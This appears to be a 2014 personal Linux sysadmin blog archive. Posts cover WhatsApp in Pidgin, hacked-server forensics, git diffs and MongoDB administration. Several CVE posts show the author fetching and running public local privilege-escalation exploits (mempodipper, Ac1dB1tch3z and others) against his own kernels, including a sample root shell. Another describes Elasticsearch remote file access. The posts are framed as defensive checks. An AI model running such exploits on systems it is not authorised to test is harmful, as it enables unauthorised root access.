Sunday, August 31, 2014

How to setup pidgin WhatsApp using credential from Nokia n900

If you own a Nokia n900 smartphone, you are in luck: you can use WhatsApp
on your pc. The intention here is personal usage, as sometimes the n900 runs out
of power whilst you are in an important conversation with friends. By setting up
WhatsApp in the pidgin messenger on linux, you also save the trouble of switching
devices back and forth.

In this article, we are going to learn how to set up pidgin so it can connect
to WhatsApp with the registration made on the Nokia n900. Of course, first, on the n900,
you will need to install yappari, a WhatsApp client for the n900, and register yourself
a WhatsApp account. This article will not cover how to install yappari on the n900 or
how to get a WhatsApp account in yappari, because it is very easy.

The official website of this plugin is available here. At the bottom of the site, there are several links for different operating systems.

  • Windows/Linux: http://davidgf.net/nightly/whatsapp-purple/

  • Ubuntu/Debian: https://launchpad.net/~whatsapp-purple/+archive/ubuntu/ppa

  • Fedora: https://copr.fedoraproject.org/coprs/davidgf/whatsapp-purple/

  • ArchLinux: https://aur.archlinux.org/packages/purple-whatsapp/


If you do not want to go through the hassle of setting up an apt repository, you can quickly do the following:

  1. go to this link

  2. depending on your cpu architecture, if it is a 64-bit cpu, click on x64/ http://davidgf.net/nightly/whatsapp-purple/x64/

  3. pick the latest version, that is last-whatsapp.so, and download it to your computer.

  4. then with root access, copy the lib to pidgin plugin directory.
    # cp last-whatsapp.so /usr/lib/purple-2

  5. restart your pidgin.


At the moment of writing, I'm using the last-whatsapp.so from the server dated
31-Jul-2014 01:02, 313075 bytes. As for pidgin, the version I'm using on debian
is Pidgin 2.10.9 (libpurple 2.10.9), and this combination works very well for
me.

Once pidgin is restarted, go to Manage Accounts and click the Add button. This is
to add the WhatsApp account that you set up in yappari. In the Add Account window
that pops up, under the protocol field, there should be a new protocol, WhatsApp,
available in the drop-down selection. Pick that.

The Username and Password fields are tricky here.
The username will be the phone number you registered in yappari; as for the password, you will need some work to retrieve it from the yappari configuration file on the n900. We will go through this step by step.

Let's start with the easy one, the username field. It is your country code followed by your mobile number, without the plus-sign prefix. For instance, if your mobile sim card is Malaysian-registered, it will look something like:

Username: 60123456789

Because the password which I'm going to show you later is a difficult one, I suggest you check the Remember password box. Unless you are paranoid, in which case you can try to memorize your password. Your choice.

For the Local alias field, put your name, or anything you like to identify yourself.

Now on to the password field. If you noticed during registration, no password is ever sent to you; the only verification WhatsApp performs is confirming the registration is valid when you create the account. Note that the WhatsApp code sent to your phone is not your password.

I followed tutorials that use wireshark and tcpdump to capture the password; see the attached trace below. This is just not possible, because the traffic is encrypted using ssl.
12:07:45.317453 IP (tos 0x0, ttl 64, id 29179, offset 0, flags [DF], proto TCP (6), length 60)
192.168.0.82.62751 > 208.43.122.151-static.reverse.softlayer.com.https: Flags [S], cksum 0x938f (correct), seq 416925910, win 5840, options [mss 1460,sackOK,TS val 2996526 ecr 0,nop,wscale 4], length 0
0x0000: 4500 003c 71fb 4000 4006 bd03 c0a8 0052 E..<q.@.@......R
0x0010: d02b 7a97 f51f 01bb 18d9 c8d6 0000 0000 .+z.............
0x0020: a002 16d0 938f 0000 0204 05b4 0402 080a ................
0x0030: 002d b92e 0000 0000 0103 0304 .-..........
12:07:46.135812 IP (tos 0x0, ttl 54, id 37650, offset 0, flags [DF], proto TCP (6), length 60)
208.43.122.151-static.reverse.softlayer.com.https > 192.168.0.82.62751: Flags [S.], cksum 0xb738 (correct), seq 2641574608, ack 416925911, win 65535, options [mss 1452,nop,wscale 9,sackOK,TS val 3690413789 ecr 2996526], length 0
0x0000: 4500 003c 9312 4000 3606 a5ec d02b 7a97 E..<..@.6....+z.
0x0010: c0a8 0052 01bb f51f 9d73 3ad0 18d9 c8d7 ...R.....s:.....
0x0020: a012 ffff b738 0000 0204 05ac 0103 0309 .....8..........
0x0030: 0402 080a dbf7 3edd 002d b92e ......>..-..
12:07:46.136301 IP (tos 0x0, ttl 64, id 29180, offset 0, flags [DF], proto TCP (6), length 52)
192.168.0.82.62751 > 208.43.122.151-static.reverse.softlayer.com.https: Flags [.], cksum 0xe429 (correct), seq 1, ack 1, win 365, options [nop,nop,TS val 2996630 ecr 3690413789], length 0
0x0000: 4500 0034 71fc 4000 4006 bd0a c0a8 0052 E..4q.@.@......R
0x0010: d02b 7a97 f51f 01bb 18d9 c8d7 9d73 3ad1 .+z..........s:.
0x0020: 8010 016d e429 0000 0101 080a 002d b996 ...m.).......-



It is impossible to decode this traffic without deep knowledge of ssl, and that is the whole point of ssl: encrypting the message in transport. So retrieving the password by sniffing network packets will not work. Instead, we will go to the n900 and retrieve the password.

  1. open an X terminal on the n900 (if you do not have one, you should install it now).

  2. change directory to .config/scorpius and check your current directory should be /home/user/.config/scorpius
    $ cd .config/scorpius
    $ pwd
    /home/user/.config/scorpius 

  3. check current directory content with ls
    $ ls
    counters.conf yappari.conf yappari.log

  4. the important file is yappari.conf, which contains the password we need, so cat yappari.conf
    $ cat yappari.conf
    [General]
    whatsnew=555555555
    imsi=502121212121212
    registered=true
    number=123456789
    cc=60
    phonenumber=60123456789
    password="ABCDEFGHIJKLMNOPQRSTUVWXYZ/="
    username=JohnSmith
    creation=1407484663
    expiration=1439020663
    kind=free
    accountstatus=active
    lastsync=1407484676392
    status=Available
    lastimagedir=/home/user/MyDocs/DCIM
    nextchallenge="APAPAPAPAPAPAPAPAPAPAPAPAPAP"


You will see content similar to the above; copy and paste the password into pidgin. Note, because it is long, you might want to copy this file off the device first and paste from there.
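For example, if openssh is installed on the n900, you could pull the file over the network instead of retyping the password. The IP address below is an assumption; use your n900's address.

$ scp user@192.168.0.10:/home/user/.config/scorpius/yappari.conf .
$ grep password yappari.conf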


Fill in the password from step 4 into the pidgin password field. Note that the value below is just for demonstration; use your own.


Password: ABCDEFGHIJKLMNOPQRSTUVWXYZ/=





When you click the checkbox for 'Enabled' for your account, it should now connect.


WhatsApp has a smiley theme called emoji, and you will want to install it: WhatsApp users normally send emoji, which pidgin cannot otherwise decode, displaying them as rectangular boxes containing hexadecimal digits. To install emoji for WhatsApp, follow these steps.



  1. read introduction at https://github.com/davidgfnet/whatsapp-purple/blob/master/README.md#how-do-i-get-graphical-whatsapp-smileys

  2. download the unicode-emoji and emoji-for-pidgin to your home directory.

  3. extract the zip files and copy the directory to your pidgin home.
    $ cp -R android apple symbola $HOME/.purple/smileys
    $ cp -R Emoji-for-Pidgin $HOME/.purple/smileys
    $ ls $HOME/.purple/smileys
    android apple Emoji-for-Pidgin symbola

  4. restart your pidgin and go to Tools -> Preferences -> Themes.

  5. under Smiley Theme, select the emoji you want. :)


That's it. Start sending WhatsApp message from your pc!




UPDATE 


If you set up WhatsApp on pidgin using this article between 31 August 2014 and 22 November 2014, you should really fetch the plugin update again. Then, in the settings for this WhatsApp account in pidgin, under the Advanced tab, change the resource field to Android-2.31.151-443. Restart pidgin and it should connect again.

Saturday, August 30, 2014

What should you do if the server you administer got hacked?

Realizing that your server has been compromised creates confusion and reduces confidence, and if the server is serving user requests, you have to declare downtime. That's not good.

In order to restore service as quickly as possible, it is best to have a replacement server ready to swap in instantly, so you can reduce the noise from customers. But to prevent such attacks in the future, you must at least identify how it happened and take countermeasures.

In this article, we will learn how to discover what happened and then take countermeasures.

Quick solution.

Probably the quickest solution is to format and reinstall the operating system together with the applications that serve user requests. This is reasonable if you do not have a backup server and want to reinstate service as soon as possible. But it does not answer the actual question of how the hack took place; hence, it might happen again in the near future.

Long and workable solution.

  1. identify your own custom application deployed and start to investigate from there.

  2. update the system using package manager and restart system.

  3. tighten up security


identify your own custom application deployed and start to investigate from there.

Because open-source software is mostly well tested and updated often, the first place to investigate is usually your own application. Hence, you must have a good understanding of your app so you can quickly identify the source of the problem.

Following is a set of commands which may help you in your investigation.

  • w
    see who is on the server

  • sudo netstat -nalp | grep ":22"
    change 22 to the port your application listens on; check for anything abnormal.

  • if your custom applications use open-source components, check their logs as well, because attackers constantly look for exploits in open-source software and target them.


update the system using package manager and restart system.

You can start by checking the following.

  • last
    check recent logins for any invalid access.

  • cat /var/log/secure* | grep Accept
    check accepted logins for any you do not recognize.

  • ps -elf
    check whether malware is running; if you spot a process, find where it runs from and delete all the malware files.

  • ls /tmp /var/tmp /dev/shm -la
    these directories normally allow any process to write into them, so check for any fishy files here.

  • file <filename>
    check what type a file is.

  • cat /etc/passwd
    check for unknown entries that are not supposed to be there.

  • sudo netstat -plant |awk ' /^tcp/ {split($7, a, "/"); print $6, a[2]}' |sort | uniq -c | sort -n| tail
    4 ESTABLISHED java
    4 LISTEN kadmind
    5 LISTEN java
    5 LISTEN python
    6 ESTABLISHED python
    if your server has been turned into a bot, the malware will probably be launching a lot of ddos traffic; with this command, you should be able to identify whether the tcp connection count has spiked.

  • sudo netstat -plant | awk '$4 ~ /:22$/ {print $5}' | cut -f1 -d: | sort | uniq -c | sort -n
    1
    1 0.0.0.0
    2 192.168.0.2
    check the total connections established to your server on port 22.

  • sudo netstat -plant | awk '/^tcp/ {print $6}' | sort | uniq -c | sort -n
    2 CLOSING
    4 SYN_RECV
    5 LAST_ACK
    6 FIN_WAIT1
    12 LISTEN
    13 FIN_WAIT2
    344 TIME_WAIT
    977 ESTABLISHED
    check network states; this is good information should your server suddenly spike in ESTABLISHED or SYN states. If there is a spike, you will know something may have gone fishy.

  • $HOME/.bash_history
    check every user's bash_history for anything suspicious. If the server application runs under a dedicated user id, especially check the bash_history in that user's home directory.

  • find / -mtime -5
    find which files have changed within the last 5 days.


If nothing is found, just update the system packages using the package manager and reboot the system.

tighten up security and monitor

If you have a loose firewall policy (iptables or a hardware firewall), you should review it.

For future prevention, set up monitoring that notifies you when the TCP connection count exceeds a threshold or suddenly spikes.
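A minimal sketch of that idea, suitable for running from cron; the threshold and mail address are assumptions to adapt, and it assumes a working mail command on the host.

#!/bin/bash
# warn when established TCP connections pass a threshold
THRESHOLD=500
count=$(netstat -ant | grep -c ESTABLISHED)
if [ "$count" -gt "$THRESHOLD" ]; then
    echo "TCP ESTABLISHED count is $count on $(hostname)" | mail -s "connection spike alert" admin@example.com
fi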

 

Whilst these steps are not exhaustive, as attackers always come up with different types of attacks, you should be prepared and alert. Gather information by searching online as well.

Friday, August 29, 2014

Where to read branch work (or commits) in github?

Have you been stuck either of these situations:

  • a lot of the time, when you do your work on a branch and days pass, you want to review your own code by browsing through the history, but have no idea how?

  • or maybe you want to let your colleague take a look at the work you have done and review the code for you?

  • or see the changes you made in the branch and write a change log before you merge back into the master branch.


Today, we are going to learn just that.

On the command line, you can use git log. LEAD-451 is one of my branches, used here for illustration purposes; change it to the branch you want to view.
git log master...LEAD-451

This will show the changes, including commit, author, date and message. Note the order is reverse chronological, with the latest at the top and the oldest at the bottom. You can use --reverse to see the oldest first.

If you want to see the file status, add --name-status to the command.

If you want to see the actual code changes, it is very intuitive: you use git diff. So
git diff master...LEAD-451

and you get a lengthy diff between branch master and branch LEAD-451. If you want to generate a patch, pass -p to the command. If you want to see which files changed, were added, or were deleted between the two branches, add the parameter --name-status or --name-only.
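Putting it together, a quick review session might look like this; the branch name is illustrative.

git log master...LEAD-451 --reverse        # commits on the branch, oldest first
git log master...LEAD-451 --name-status    # commits plus per-file change status
git diff master...LEAD-451 --name-only     # just the names of files that differ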

Enough for the command line, now we go for some visual representation. For this, I will illustrate using github.

With the same condition, in github, there is a feature called compare view.

https://github.com/Opentracker/luceneOnCassandra/compare/master...LEAD-451

As you can see at the bottom, the output is very much the same as the command-line output we tried before. But github condenses everything into one view; very nice.

Assuming you are at your project landing page at github, how do you quickly get the compare view?

  • at the front page, https://github.com/Opentracker/luceneOnCassandra/

  • click on the branch drop down, select the branch you want to diff. example LEAD-451

  • at the page https://github.com/Opentracker/luceneOnCassandra/tree/LEAD-451, you can click on the compare button.


 

That's it. I hope you learned something; please donate as a means to continue funding this blog's maintenance. Thank you.

Sunday, August 17, 2014

CVE-2009-2692 Linux NULL pointer dereference due to incorrect proto_ops initializations

Again, as with previous CVE posts, I would like to state that the intention of this article is to protect and safeguard administrators and developers who make a living maintaining computer systems. This post is meant to make those who run Linux operating systems aware so they can protect against malicious attacks. I take no responsibility if you and/or other evil-minded people use this to damage others.

This exploit (you can download the original source here) is written in C, and it requires some understanding of Linux systems. You should find explanations of the source exploit.c here, here or here. As explained in the documentation, this exploit mainly targets these kernel versions:

  • kernel 2.6.0 to 2.6.30.4

  • kernel 2.4.4 to 2.4.37.4


So check whether your server kernel falls within this range and do a kernel update if it does, as a fix is already available.

According to the CVE, the description of this exploit is:

The Linux kernel 2.6.0 through 2.6.30.4, and 2.4.4 through 2.4.37.4, does not initialize all function pointers for socket operations in proto_ops structures, which allows local users to trigger a NULL pointer dereference and gain privileges by using mmap to map page zero, placing arbitrary code on this page, and then invoking an unavailable operation, as demonstrated by the sendpage operation (sock_sendpage function) on a PF_PPPOX socket.

Okay, let's download the source and try it.
user@localhost:~/Desktop/exploit/wunderbar_emporium$ whoami
user
user@localhost:~/Desktop/exploit/wunderbar_emporium$ sh -x wunderbar_emporium.sh
++ pwd
++ sed 's/\//\\\//g'
+ ESCAPED_PWD='\/home\/user\/Desktop\/exploit\/wunderbar_emporium'
+ sed 's/\/home\/spender/\/home\/user\/Desktop\/exploit\/wunderbar_emporium/g' pwnkernel.c
+ mv pwnkernel.c pwnkernel2.c
+ mv pwnkernel1.c pwnkernel.c
+ killall -9 pulseaudio
++ uname -p
+ IS_64=unknown
+ OPT_FLAG=
+ '[' unknown = x86_64 ']'
++ cat /proc/sys/vm/mmap_min_addr
+ MINADDR=65536
+ '[' 65536 = '' -o 65536 = 0 ']'
+ '[' '!' -f /usr/sbin/getenforce ']'
+ cc -fno-stack-protector -fPIC -shared -o exploit.so exploit.c
+ cc -o pwnkernel pwnkernel.c
+ ./pwnkernel
[+] Personality set to: PER_SVR4
Pulseaudio is not suid root!
+ mv -f pwnkernel2.c pwnkernel.c
user@localhost:~/Desktop/exploit/wunderbar_emporium$ whoami
user

So this server is not vulnerable to this exploit! All good.

Friday, August 15, 2014

Information on the malware Linux_time_y_2014 and Linux_time_y_2015 is needed

This article is a bit special: it is more about seeking information and documenting it. If you have this type of information, please leave a comment below.

If you have noticed that the following files exist on your system:

  • Linux_time_y_2014

  • Linux_time_y_2015 or xudp

  • .E7739C9DFEAC5B8A69A114E45AB327D41 or mysql1.0

  • .E7739C9DFEAC5B8A69A114E45AB327D4 or mysql1s


then this is malware. If it has been uploaded or copied to your server, you should check whether it is running on the system and remove it if it is.

I googled and searched social sites; there is not much information beyond identification of these files as malware. If you happen to know the CVE or where the source is, please kindly leave a message in the comments.

The intention is to understand what this malware does other than launching ddos attacks, to document it here, and to provide information to others who seek it. If you know how to dissect this binary and analyze its content, please do share as well.

Thank you.

Sunday, August 3, 2014

CVE-2014-0196 kernel: pty layer race condition leading to memory corruption

First off, I would like to state that the intention of this article is to protect and safeguard administrators and developers who make a living maintaining computer systems. This post is meant to make those who run Linux operating systems aware so they can protect against malicious attacks. I take no responsibility if you and/or other evil-minded people use this to damage others.

This exploit is written in C, and it requires some understanding of Linux systems. You should find an explanation of the source cve-2014-0196-md.c here. If you run an old system, you might want to read further; but check the kernel that comes with your distribution, as it may already be fixed.

From the description:

The n_tty_write function in drivers/tty/n_tty.c in the Linux kernel through 3.14.3 does not properly manage tty driver access in the "LECHO & !OPOST" case, which allows local users to cause a denial of service (memory corruption and system crash) or gain privileges by triggering a race condition involving read and write operations with long strings.

Okay, let's move on to compile and test it out.
user@localhost:~$ wget -O cve-2014-0196-md.c http://bugfuzz.com/stuff/cve-2014-0196-md.c
user@localhost:~$ gcc cve-2014-0196-md.c -lutil -lpthread
user@localhost:~$ ./a.out
[+] Resolving symbols
[+] Resolved commit_creds: 0xffffffff8105bb28
[+] Resolved prepare_kernel_cred: 0xffffffff8105bd3b
[+] Doing once-off allocations
[+] Attempting to overflow into a tty_struct......
........................................................................................................................................................................................................................................................................................................................................................................................................................^C

Apparently this kernel is not vulnerable to this exploit. Another great day. :-)

Saturday, August 2, 2014

CVE-2012-0056 mempodipper

First off, I would like to make clear that the intention of this article is to protect and safeguard administrators and developers who make a living for their families by maintaining computer systems for companies. This post is to make those who run the Linux operating system aware of this issue so they can protect against malicious attacks. I take no responsibility if you and/or your evil mind use this to damage others.

This source is written in C and requires some understanding of Linux systems as well. You can find an explanation of the source mempodipper.c here. It has since been fixed in this patch, so current distributions should carry the fix in their kernels anyway. But in case you run an old system with kernel 2.6.39 or a non-stock kernel, you might want to read more.

With that said, let's download this source and compile it.
user@localhost:~$ wget http://www.exploit-db.com/download/18411 -O 18411.c
--2014-07-19 16:52:59-- http://www.exploit-db.com/download/18411
Resolving www.exploit-db.com (www.exploit-db.com)... 192.99.12.218, 198.58.102.135
Connecting to www.exploit-db.com (www.exploit-db.com)|192.99.12.218|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://www.exploit-db.com/download/18411/ [following]
--2014-07-19 16:53:00-- http://www.exploit-db.com/download/18411/
Reusing existing connection to www.exploit-db.com:80.
HTTP request sent, awaiting response... 200 OK
Length: 6348 (6.2K) [application/txt]
Saving to: ‘18411.c’

100%[====================================================================================================================>] 6,348 --.-K/s in 0.001s

2014-07-19 16:53:00 (7.31 MB/s) - ‘18411.c’ saved [6348/6348]

user@localhost:~$ gcc 18411.c -o 18411
user@localhost:~$ ./18411
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================

[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/7398/mem in child.
[+] Sending fd 3 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x4022c0.
[+] Calculating su padding.
[+] Seeking to offset 0x4022a6.
[+] Executing su with shellcode.
^C
user@localhost:~$ whoami
user

So we have downloaded the source, compiled it using gcc, and run it. As you can see in the video, if the kernel is vulnerable to this exploit, the exploit finishes successfully and, upon issuing the command whoami, root is shown. But in the example above, my kernel is compiled with the fix, so the system is safe. You can copy this program to any server you want to check and make sure the exploit does not run successfully.

That's it for this article, I hope you enjoy this writing.

Friday, August 1, 2014

CVE-2014-3120 Elastic Search Remote Code Execution

First off, I would like to make clear that the intention of this article is to protect and safeguard administrators and developers who use an Elasticsearch cluster in their production systems to make a living for their families. This post is to make those who deploy Elasticsearch clusters aware of this issue so they can protect against malicious attacks. I take no responsibility if you and/or your evil mind use this to damage others.

To quickly fix this issue, add
script.disable_dynamic: true

to your elasticsearch.yml configuration file and restart the Elasticsearch instance.

Note that script.disable_dynamic defaults to false in Elasticsearch version 1.1.2 and below; from 1.2.0 onward it defaults to true.

Just load this HTML file, CVE-2014-3120, in your browser, then change the "ES_IP_Address" field and the "File to read/append to" field. If your Elasticsearch instance allows access via port 9200, it will show the file content; if you have blocked the port and disabled dynamic scripting, you are safe. The same probe can be run from the command line, as sketched below.
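A minimal curl sketch of that probe, assuming the node listens on 192.168.0.2:9200 (substitute your own ES_IP_Address) and has at least one document indexed; on Elasticsearch 1.x the script below is only evaluated when dynamic scripting is enabled:

# Ask Elasticsearch to evaluate a trivial dynamic script. A vulnerable
# node returns "check" : [ 2 ] in the hit's fields; a locked-down node
# returns a scripting error instead.
curl -XPOST 'http://192.168.0.2:9200/_search?pretty' -d '{
  "size": 1,
  "query": { "match_all": {} },
  "script_fields": {
    "check": { "script": "1 + 1" }
  }
}'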

If the file content is shown, you can then start writing to it (you need to change the HTML source to allow writes). When that happens, an attacker can gain access to your box by planting a public/private key pair. That's not good!

The HTML file is an adaptation of http://www.exploit-db.com/exploits/33370/; if you are interested in reading more, please follow this link.

Friday, July 25, 2014

CVE-2010-3081 Ac1dB1tch3z

First off, I would like to make clear that the intention of this article is to protect and safeguard administrators and developers who make a living for their families by maintaining computer systems for companies. This post is to make those who run the Linux operating system aware of this issue so they can protect against malicious attacks. I take no responsibility if you and/or your evil mind use this to damage others.

This exploit only affects kernel versions 2.6.26-rc1 through 2.6.36-rc4, so be alert if your production servers are running these kernels. It has since been fixed upstream, as can be seen here.

So what is this exploit about?

A vulnerability in the 32-bit compatibility layer for 64-bit systems was reported. It is caused by insecure allocation of user space memory when translating system call inputs to 64-bit. A stack pointer underflow can occur when using the "compat_alloc_user_space" method inside arch/x86/include/asm/compat.h with an arbitrary length input.

Or read the longer descriptions here and here.
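Since the bug lives in the 32-bit compatibility layer of 64-bit kernels, a quick pre-check is to confirm that the layer is even present; a sketch, with the config file path being the usual distro convention:

# Only x86_64 kernels with 32-bit emulation expose the vulnerable
# compat_alloc_user_space() path.
uname -m
# CONFIG_IA32_EMULATION=y means 32-bit system calls are accepted.
grep CONFIG_IA32_EMULATION /boot/config-$(uname -r)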

Get the source here and compile it.
user@localhost:~$ gcc -m32 15024.c -o 15024
user@localhost:~$ ./15024
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
!!! Un4bl3 t0 g3t r3l3as3 wh4t th3 fuq!

If the kernel is vulnerable to this exploit, the output looks like the sample below.
[bob@xxx ~]$ date
Sun Sep 19 18:22:38 BRT 2010
[bob@xxx ~]$ cat /etc/redhat-release
Red Hat Enterprise Linux Server release 5.5 (Tikanga)
[bob@xxx ~]$ uname -a
Linux xxx 2.6.18-194.11.3.el5 #1 SMP Mon Aug 23 15:51:38 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux
[bob@xxx ~]$ id
uid=500(bob) gid=500(bob) groups=500(bob)
[bob@xxx ~]$ ./15024
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as3: 2.6.18-194.11.3.el5
??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d
$$$ L00k1ng f0r kn0wn t4rg3tz..
$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t...
$$$ selinux_ops->ffffffff80327ac0
$$$ dummy_security_ops->ffffffff804b9540
$$$ capability_ops->ffffffff80329380
$$$ selinux_enforcing->ffffffff804bc2a0
$$$ audit_enabled->ffffffff804a7124
$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d
$$$ Prepare: m0rn1ng w0rk0ut b1tch3z
$$$ Us1ng st4nd4rd s3ash3llz
$$$ 0p3n1ng th3 m4giq p0rt4l
$$$ bl1ng bl1ng n1gg4 :PppPpPPpPPPpP
sh-3.2# id
uid=0(root) gid=500(bob) groups=500(bob)

That's it! Stay safe.

Sunday, July 20, 2014

Study MongoDB administration

Today we are going to look into MongoDB administration. We will focus on a few areas: backup, monitoring, configuration, and importing and exporting data.

backup and restore

  • journaling must be enabled on the logical volume (see the note below on turning it on).
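The 32-bit startup warnings later in this post show journaling defaulting to off, so here is a minimal sketch of turning it on explicitly (the dbpath and config file location are assumptions; adjust them to your installation):

# Start mongod with journaling enabled (32-bit builds default to off).
mongod --journal --dbpath /var/lib/mongodb
# or persistently, in the old-style /etc/mongodb.conf:
#   journal = true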


To back up, start by using the command mongodump.

jason@localhost:~$ mongodump
connected to: 127.0.0.1
2014-07-07T22:46:09.351+0800 all dbs
2014-07-07T22:46:09.352+0800 DATABASE: test to dump/test
2014-07-07T22:46:09.354+0800 test.system.indexes to dump/test/system.indexes.bson
2014-07-07T22:46:09.355+0800 4 documents
2014-07-07T22:46:09.356+0800 test.testData to dump/test/testData.bson
2014-07-07T22:46:09.359+0800 400 documents
2014-07-07T22:46:09.360+0800 Metadata for test.testData to dump/test/testData.metadata.json
2014-07-07T22:46:09.360+0800 test.users to dump/test/users.bson
2014-07-07T22:46:09.361+0800 1 documents
2014-07-07T22:46:09.362+0800 Metadata for test.users to dump/test/users.metadata.json
2014-07-07T22:46:09.362+0800 test.accounts to dump/test/accounts.bson
2014-07-07T22:46:09.369+0800 2 documents
2014-07-07T22:46:09.370+0800 Metadata for test.accounts to dump/test/accounts.metadata.json
2014-07-07T22:46:09.370+0800 test.transactions to dump/test/transactions.bson
2014-07-07T22:46:09.372+0800 1 documents
2014-07-07T22:46:09.373+0800 Metadata for test.transactions to dump/test/transactions.metadata.json
2014-07-07T22:46:09.374+0800 DATABASE: mydb to dump/mydb
2014-07-07T22:46:09.375+0800 mydb.system.indexes to dump/mydb/system.indexes.bson
2014-07-07T22:46:09.376+0800 2 documents
2014-07-07T22:46:09.377+0800 mydb.testData to dump/mydb/testData.bson
2014-07-07T22:46:09.378+0800 27 documents
2014-07-07T22:46:09.389+0800 Metadata for mydb.testData to dump/mydb/testData.metadata.json
2014-07-07T22:46:09.390+0800 mydb.users to dump/mydb/users.bson
2014-07-07T22:46:09.391+0800 1 documents
2014-07-07T22:46:09.392+0800 Metadata for mydb.users to dump/mydb/users.metadata.json
2014-07-07T22:46:09.392+0800 DATABASE: mp3db to dump/mp3db
2014-07-07T22:46:09.393+0800 mp3db.system.indexes to dump/mp3db/system.indexes.bson
2014-07-07T22:46:09.394+0800 4 documents
2014-07-07T22:46:09.395+0800 mp3db.mp3.files to dump/mp3db/mp3.files.bson
2014-07-07T22:46:09.396+0800 1 documents
2014-07-07T22:46:09.397+0800 Metadata for mp3db.mp3.files to dump/mp3db/mp3.files.metadata.json
2014-07-07T22:46:09.397+0800 mp3db.mp3.chunks to dump/mp3db/mp3.chunks.bson
2014-07-07T22:46:09.401+0800 2 documents
2014-07-07T22:46:09.401+0800 Metadata for mp3db.mp3.chunks to dump/mp3db/mp3.chunks.metadata.json
2014-07-07T22:46:09.402+0800 DATABASE: admin to dump/admin
2014-07-07T22:46:09.406+0800 DATABASE: config to dump/config

Let's remove some data from the database before we restore.
jason@localhost:~$ mongo
MongoDB shell version: 2.6.3
connecting to: test
Server has startup warnings:
2014-06-24T21:23:40.227+0800 [initandlisten]
2014-06-24T21:23:40.227+0800 [initandlisten] ** NOTE: This is a 32 bit MongoDB binary.
2014-06-24T21:23:40.227+0800 [initandlisten] ** 32 bit builds are limited to less than 2GB of data (or less with --journal).
2014-06-24T21:23:40.227+0800 [initandlisten] ** Note that journaling defaults to off for 32 bit and is currently off.
2014-06-24T21:23:40.228+0800 [initandlisten] ** See http://dochub.mongodb.org/core/32bit
2014-06-24T21:23:40.228+0800 [initandlisten]
> use mp3db;
switched to db mp3db
> show tables;
mp3.chunks
mp3.files
system.indexes
> db.mp3.chunks.remove({});
WriteResult({ "nRemoved" : 2 })
> db.mp3.files.remove({});
WriteResult({ "nRemoved" : 1 })
> db.mp3.chunks.find();
> db.mp3.files.find();
>

Now we restore using command mongorestore.
jason@localhost:~$ mongorestore --collection mp3.chunks --db mp3db dump/mp3db/mp3.chunks.bson
connected to: 127.0.0.1
2014-07-07T23:14:43.504+0800 dump/mp3db/mp3.chunks.bson
2014-07-07T23:14:43.504+0800 going into namespace [mp3db.mp3.chunks]
Restoring to mp3db.mp3.chunks without dropping. Restored data will be inserted without raising errors; check your server log
2 objects found
2014-07-07T23:14:43.534+0800 Creating index: { key: { _id: 1 }, name: "_id_", ns: "mp3db.mp3.chunks" }
2014-07-07T23:14:43.635+0800 Creating index: { key: { files_id: 1, n: 1 }, name: "files_id_1_n_1", ns: "mp3db.mp3.chunks" }

jason@localhost:~$ mongorestore --collection mp3.files --db mp3db dump/mp3db/mp3.files.bson
connected to: 127.0.0.1
2014-07-07T23:17:24.813+0800 dump/mp3db/mp3.files.bson
2014-07-07T23:17:24.813+0800 going into namespace [mp3db.mp3.files]
Restoring to mp3db.mp3.files without dropping. Restored data will be inserted without raising errors; check your server log
1 objects found
2014-07-07T23:17:24.819+0800 Creating index: { key: { _id: 1 }, name: "_id_", ns: "mp3db.mp3.files" }
2014-07-07T23:17:24.822+0800 Creating index: { key: { filename: 1, uploadDate: 1 }, name: "filename_1_uploadDate_1", ns: "mp3db.mp3.files" }

The restoration process looks good; now we verify the content.
jason@localhost:~$ mongo
MongoDB shell version: 2.6.3
connecting to: test
Server has startup warnings:
2014-06-24T21:23:40.227+0800 [initandlisten]
2014-06-24T21:23:40.227+0800 [initandlisten] ** NOTE: This is a 32 bit MongoDB binary.
2014-06-24T21:23:40.227+0800 [initandlisten] ** 32 bit builds are limited to less than 2GB of data (or less with --journal).
2014-06-24T21:23:40.227+0800 [initandlisten] ** Note that journaling defaults to off for 32 bit and is currently off.
2014-06-24T21:23:40.228+0800 [initandlisten] ** See http://dochub.mongodb.org/core/32bit
2014-06-24T21:23:40.228+0800 [initandlisten]
> use mp3db;
switched to db mp3db
> db.mp3.files.find();
{ "_id" : ObjectId("53ad61c844ae8a6ee12fcb63"), "chunkSize" : NumberLong(262144), "length" : NumberLong(316773), "md5" : "7293e9fd795e2bb6d5035e5b69cb2923", "filename" : "django.mp3", "contentType" : "audio/mpeg", "uploadDate" : ISODate("2014-06-27T12:21:28.646Z"), "aliases" : null }
>

Looks good. Now we move on to monitoring.

monitoring

mongostat - captures and returns counts of database operations by type (e.g. insert, query, update, delete). These counts report on the load distribution on the server.
jason@localhost:~$ mongostat
connected to: 127.0.0.1
insert query update delete getmore command flushes mapped vsize res faults locked db idx miss % qr|qw ar|aw netIn netOut conn time
*0 *0 *0 *0 0 1|0 0 320m 445m 10m 14 config:0.0% 0 0|0 0|0 62b 3k 1 22:33:54
*0 *0 *0 *0 0 1|0 0 320m 445m 10m 0 test:0.0% 0 0|0 0|0 62b 3k 1 22:33:55
*0 *0 *0 *0 0 1|0 0 320m 445m 10m 0 test:0.0% 0 0|0 0|0 62b 3k 1 22:33:56
^C

mongotop tracks and reports the current read and write activity of a MongoDB instance, and reports these statistics on a per collection basis.
jason@localhost:~$ mongotop
connected to: 127.0.0.1

ns total read write 2014-07-07T15:20:38
mp3db.mp3.chunks 0ms 0ms 0ms
local.system.replset 0ms 0ms 0ms
local.system.namespaces 0ms 0ms 0ms
local.system.indexes 0ms 0ms 0ms
local.startup_log 0ms 0ms 0ms
config.version 0ms 0ms 0ms
config.system.namespaces 0ms 0ms 0ms

